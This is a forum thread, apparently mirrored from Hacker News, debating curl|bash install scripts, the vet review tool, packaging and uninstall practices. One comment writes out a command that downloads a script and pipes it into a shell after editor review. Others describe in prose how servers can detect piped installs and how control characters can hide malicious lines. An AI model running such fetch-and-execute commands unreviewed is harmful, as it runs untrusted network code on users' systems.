Readit News logoReadit News
pxeger1 · a month ago
My problem with curl|bash is not that the script might be malicious - the software I'm installing could equally be malicious. It's that it may be written incompetently, or just not with users like me in mind, and so the installation gets done in some broken, brittle, or non-standard way on my system. I'd much rather download a single binary and install it myself in the location I know it belongs in.
jerf · a month ago
I've also seen really wonderfully-written scripts that, if you read them manually, allow you to change where whatever it is is installed, what features it may have, optional integration with Python environments, or other things like that.

I at least skim all the scripts I download this way before I run them. There's just all kinds of reasons to, ranging all the way from the "is this malicious" to "does this have options they're not telling me about that I want to use".

A particular example is that I really want to know if you're setting up something that integrates with my distro's package manager or just yolo'ing it somewhere into my user's file system, and if so, where.

AndyMcConachie · a month ago
100% agree. The question of whether I should install lib-X for language-Y using Y's package management system or the distribution's package management system is unresolved.
inetknght · a month ago
> I've also seen really wonderfully-written scripts that

I'll take a script that passes `shellcheck ./script.sh` (or, any other static analysis) first. I don't like fixing other people's bugs in their installation scripts.

After that, it's an extra cherry on top to have everything configurable. Things that aren't configurable go into a container and I can configure as needed from there.

sim7c00 · a month ago
right? read before u run. if you cant make sense of it all, dont run. if you can make sense of it all, you're free to refactor it to your own taste :) saves some time usually. as you say, a lot are quite nicely written
mingus88 · a month ago
My problem with it is that it encourages unsafe behavior.

How many times will a novice user follow that pattern until some jerk on discord drops a curl|bash and gets hits

IRC used to be a battlefield for these kinds of tricks and we have legit projects like homebrew training users it’s normal to raw dog arbitrary code direcly into your environment

SkiFire13 · a month ago
What would you consider a safer behaviour for downloading programs from the internet?
troupo · a month ago
> My problem with it is that it encourages unsafe behavior.

Then why don't Linux distributions encourage safe behaviour? Why do you still need sudo permissions to install anything on most Linux systems?

> How many times will a novice user follow that pattern until some jerk on discord

I'm not a novice user and I will use this pattern because it's frankly easier and faster, especially when the current distro doesn't have some combination of things installed, or doesn't have certain packages, or...

IgorPartola · a month ago
This exactly. You never know what it will do. Will it simply check that you have Python and virtualenv and install everything into a single directory? Or will it hijack your system by adding trusted remote software repositories? Will it create new users? Open network ports? Install an old version of Java it needs? Replace system binaries for “better” ones? Install Docker?

Operating systems already have standard ways of distributing software to end users. Use it! Sure maybe it takes you a little extra time to do a one off task of adding the ability to build Debian packages, RPM, etc. but at least your software will coexist nicely with everything else. Or if your software is such a prima-donna that it needs its own OS image, package it in a Docker container. But really, just stop trying to reinvent the wheel (literally).

stouset · a month ago
Yes! What I really want from something like this is sandboxing the install process to give me a guaranteed uninstall process.
mjmas · a month ago
tinycorelinux reinstalls its extensions into a tmpfs every boot which works nicely. (and you can have different lists of extensions that get loaded)
hsbauauvhabzb · a month ago
Why would you possibly want to remove my software?
1vuio0pswjnm7 · a month ago
Many times a day both in scripts and interactively I use a small program I refer to as "yy030" that filters URLs from stdin. It's a bit like "urlview" but uses less complicated regex and is faster. There is no third party software I use that is distributed via "curl|bash" and in practice I do not use curl or bash, however if I did I might use yy030 to extract any URLs from install.sh something like this

    curl https://example.com/install.sh|yy030
or

    curl https://example.com/install.sh > install.sh
    yy030 < install.sh
Another filter, "yy073", turns a list of URLs into a simple web page. For example,

    curl https://example.com/install.sh|yy030|yy073 > 1.htm
I can then open 1.htm in an HTML reader and select any file for download or processing by any program according to any file associations I choose, somewhat like "urlview".

I do not use "fzf" or anything like that. yy030 and yy073 are small static binaries under 50k that compile in about 1 second.

I also have a tiny script that downloads a URL received on stdin. For example, to download the third URL from install.sh to 1.tgz

     yy030 < install.sh|sed -n 3p|ftp0 1.tgz
"ftp" means the client is tnftp

"0" means stdin

nikisweeting · a month ago
This is always the beef that I've had with it. Particularly the lack of automatic updates and enforced immutable monotonic public version history. It leads to each program implementing its own non-standard self-updating logic instead of just relying on the system package managers. https://docs.sweeting.me/s/against-curl-sh
shadowgovt · a month ago
Much of the reason `curl | bash` grew up in the Linux ecosystem is that "single binary that just runs" approach isn't really feasible (1) because the various distros themselves don't adhere to enough of a standard to support it. Windows and MacOS, being mono-vendor, have a sufficiently standardized configuration that install tooling that just layers a new application into your existing ecosystem is relatively straightforward: they're not worrying about what audio subsystem you installed, or what side of the systemd turf war your distro landed on, or which of three (four? five?) popular desktop environments you installed, or whether your `/dev` directory is fully-populated. There's one answer for the equivalent of all those questions on Mac and Win so shoving some random binary in there Just Works.

Given the jungle that is the Linux ecosystem, that bash script is doing an awful lot of compatibility verification and alternatives selection to stand up the tool on your machine. And if what you mean is "I'd rather they hand me the binary blob and I just hook it up based on a manifest they also provided..." Most people do not want to do that level of configuration, not when there are two OS ecosystems out there that Just Work. They understandably want their Linux distro to Just Work too.

(1) feasible traditionally. Projects like snap and flatpak take a page from the success Docker has had and bundle the executable with its dependencies so it no longer has to worry about what special snowflake your "home" distro is, it's carrying all the audio / system / whatever dependencies it relies upon with it. Mostly. And at the cost of having all these redundant tech stacks resident on disk and in memory and only consolidateable if two packages are children of the same parent image.

fouc · a month ago
I first encountered `curl | bash` in the macOS world, most specifically with installing the worst package manager ever, homebrew, which first came out in 2009. Since then it's spread.

I call it the worst because it doesn't support installing specific versions of libraries, doesn't support downgrading, etc. It's basically hostile and forces you to constantly upgrade everything, which invariably leads to breaking a dependency and wasting time fixing that.

These days I mostly use devbox / nix at the global level and mise (asdf compatible) at the project level.

JoshTriplett · a month ago
Statically link a binary with musl, and it'll work on the vast majority of systems.

> they're not worrying about what audio subsystem you installed

Some software solves this by autodetecting an appropriate backend, but also, if you use alsa, modern audio systems will intercept that automatically.

> what side of the systemd turf war your distro landed on

Most software shouldn't need to care, but to the extent it does, these days there's systemd and there's "too idiosyncratic to support and unlikely to be a customer". Every major distro picked the former.

> or which of three (four? five?) popular desktop environments you installed

Again, most software shouldn't care. And `curl|bash` doesn't make this any easier.

> or whether your `/dev` directory is fully-populated

You can generally assume the devices you need exist, unless you're loading custom modules, in which case it's the job of your modules to provide the requisite metadata so that this works automatically.

networked · a month ago
You can also use vipe from moreutils:

  curl -sSL https://example.com/install.sh | vipe | sh
This will open the output of the curl command in your editor and let you review and modify it before passing it on to the shell. If it seems shady, clear the text.

vet looks safer. (Edit: It has the diff feature and defaults to not running the script. However, it also doesn't display a new script for review by default.) The advantage of vipe is that you probably have moreutils available in your system's package repositories or already installed.

TZubiri · a month ago
Huh

Why not just use the tools separately instead of bringing a third tool for this.

Curl -o script.sh

Cat script.sh

Bash script.sh

What a concept

networked · a month ago
What it comes down to is that people want a one-liner. Telling them they shouldn't use a one-liner doesn't work. Therefore, it is better to provide a safer one-liner.

This assumes that securing `curl | sh` separately from the binaries and packages the script downloads makes sense. I think it does. Theoretically, someone can compromise your site http://example.com with the installation script https://example.com/install.sh but not your binary downloads on GitHub. Reviewing the script lets the user notice that, for example, the download is not coming from the project's GitHub organization.

bawolff · a month ago
If you are really paranoid you should use cat -v, as otherwise terminal control characters can hide the malicious part of the script.
panki27 · a month ago
At this point, the whole world is just a complexity Olympiad
adolph · a month ago
Same but less instead of cat so my fingers stay in the keyboard.

Vet, vite, etc are kind of like kitchen single-taskers like avocado slicer-scoopers. Surely some people get great value out of them but a table-knife works just fine for me and useful in many task flows.

I'd get more value out of a cross-platform copy-paster so I'm not skip-stepping in my mind between pbpaste and xclip.

jjgreen · a month ago
Splendid idea, especially since "curl | bash" can be detected on the server [1] (which if compromised could serve hostile content to only those who do it)

[1] https://web.archive.org/web/20250622061208/http://idontplayd...

IshKebab · a month ago
This is one of those theoretical issues that has absolutely no practical implications.
dgl · a month ago
Here's an example of a phish actually using it: https://abyssdomain.expert/@filippo/114868224898553428 (also note "cat" is potentially another antipattern, less -U or cat -v is what you want).
falcor84 · a month ago
Yes, ... but if the server is compromised, they could also just inject malware directly into the binary that it's installing, right? As I see it, at the end of the day you're only safe if you're directly downloading a package whose hash you can confirm via a separate trusted source. Anything else puts you at the mercy of the server you're downloading from.
sim7c00 · a month ago
depending on what you run one method might have more success than another. protections for malicious scripts vs. modified binaries are often different tools or different components of the same tool that can have varying degrees of success.

you could also use the script to fingerprint and beacon to check if the target is worth it and what you might want to inject into said binary if thats your pick.

still i think i agree, if you gonna trust a binary from that server or a scripts its potato potato...

check what you run before you run it with whatever tools or skills u got and hope for the best.

if you go deepest into this rabbithole, you cant trust your hard disk or network card etc. so its then at some point just impossible to do anyhting. microcode patches, malicious firmwares, whatever.

for pragmatic reasons line needs to be drawn. if your paranoid good luck and dont learn too much about cybersecurity, or you will need to build your own computer :p

Deleted Comment

baq · a month ago
we've been curl | bashing software on windows since forever, it was called 'downloading and running an installer' and yes, there was the occasional malware. the solution to that was antivirus software. at this point even the younger hners should see how the wheel of history turns.

meanwhile, everyone everywhere is npm installing and docker running without second thoughts.

inanutshellus · a month ago
> meanwhile, everyone everywhere is npm installing and docker running without second thoughts.

Well... sometimes like, say, yesterday [1], there's a second thought...

  [1] https://www.bleepingcomputer.com/news/security/npm-package-is-with-28m-weekly-downloads-infected-devs-with-malware/

simonw · a month ago
"the solution to that was antivirus software"

How well did that work out?

thewebguyd · a month ago
> How well did that work out?

Classic old school antivirus? Not great, but did catch some things.

Modern EDR systems? They work extremely well when properly set up and configured across a fleet of devices as it's looking for behavior and patterns instead of just going off of known malware signatures.

bongodongobob · a month ago
As someone who manages 1000s of devices, great.
esafak · a month ago
Great. It motivated me to drop kick Windows and move to Linux and MacOS.
Cthulhu_ · a month ago
"everyone else" is using an app store that has (read: should have) vetted and reviewed applications.
tonymet · a month ago
windows has had ACLs and security descriptors for 20+ years. Linux is a super user model.

Windows Store installs, so about 75% of installs, install sandboxed and no longer need escalation.

The remaining privileged installs that prompt with UAC modal are guarded by MS Defender for malicious patterns.

Comparing sudo <bash script> to any Windows install is 30+ years out of date. sudo can access almost all memory, raw device access, and anywhere on disk.

eredengrin · a month ago
> Comparing sudo <bash script> to any Windows install is 30+ years out of date. sudo can access almost all memory, raw device access, and anywhere on disk.

They didn't say anything about sudo, so assuming global filesystem/memory/device/etc access is not really a fair comparison. Many installers that come as bash scripts don't require root. There are definitely times I examine installer scripts before running them, and sudo is a pretty big determining factor in how much examination an installer will get from me (other factors include the reputation of the project, past personal experience with it, whether I'm running it in a vm or container already, how I feel on the day, etc).

ndsipa_pomu · a month ago
At least with curl and bash, the code is human readable, so it's easy to inspect it as long as you have some basic knowledge of bash scripts.
fragmede · a month ago
software running in docker's a bit more sandboxed than running outside of it, even if it's not bulletproof.
johnfn · a month ago
Am I missing something? Even if you do `vet foobar-downloader.sh` instead of `curl foobar-downloader.sh | bash`, isn't your next command going to be to execute `foobar` regardless, "blindly trusting" that all the source in the `foobar` repository isn't compromised, etc?
lr0 · a month ago
No it says that it will show you the script first so you can review it. What I don't get is why do you nee d a program for this, you can simple curl the script to a file, `cat` it, and review it.
simonw · a month ago
It shows you the installation script but that doesn't help you evaluate if the binary that the script installs is itself safe to run.
geysersam · a month ago
Yes but even if you inspect the code of the installation script the program you just installed might still be compromised/malicious? It doesn't seem more likely that an attacker managed to compromise an installation script, than that they managed to compromise the released binary itself.
loloquwowndueo · a month ago
If you’re just going to run it blindly you don’t need vet. It’s not automatic - just gives you a chance to review the script before run I h it.
Galanwe · a month ago
The whole point of "curl|bash" is to skip dependency on package managers and install on a barebone machine. Installing a tool that allow to install tools without installation tool is...
chii · a month ago
but then it needs to come with a curl|bash uninstall tool. Most of these install scripts are just half the story, and the uninstalling part doesn't exist.
ryandrake · a month ago
Sadly, a great many 3rd party developers don't give a single shit about uninstallation, and won't lift a finger to do it cleanly, correctly and completely. If their installer/packager happens to do it, great, but they're not going to spend development cycles making it wonderful.
jrpear · a month ago
For those install scripts which allow changing the install prefix (e.g. autoconf projects---though involving a built step too), I've found GNU Stow to be a good solution to the uninstall situation. Install in `/usr/local/stow` or `~/.local/stow` then have Stow set up symlinks to the final locations. Then uninstall with `stow --delete`.
ndsipa_pomu · a month ago
Most of the time I've seen curl|bash, it is to add a repository source to the package manager (debian/ubuntu).
nikisweeting · a month ago
this is the only sane way to do it, curl|sh should just automate the package manager commands
jrm4 · a month ago
As an old-timer, going through this thread, I must say that there's just not enough hate for the whole Windows/Mac OS inclination to not want to let users be experimental.

Everyone here is sort of caught up in this weird middle ground, where you're expecting an environment that is both safe and experimental -- but the two dominant Oses do EVERYTHING THEY CAN to kill the latter, which, funny enough, can also make the former worse.

Do not forget, for years you have been in a world in which Apple and Microsoft do not want you to have any real power.

aezart · a month ago
I think aside from any safety issues, another reason to prefer a deb or something over curl | bash is that it lets your package manager know what you're installing. It can warn you about unmet dependencies, it knows where all the individual components are installed, etc. When I see a deb I feel more confident that the software will play nicely with other stuff on the system.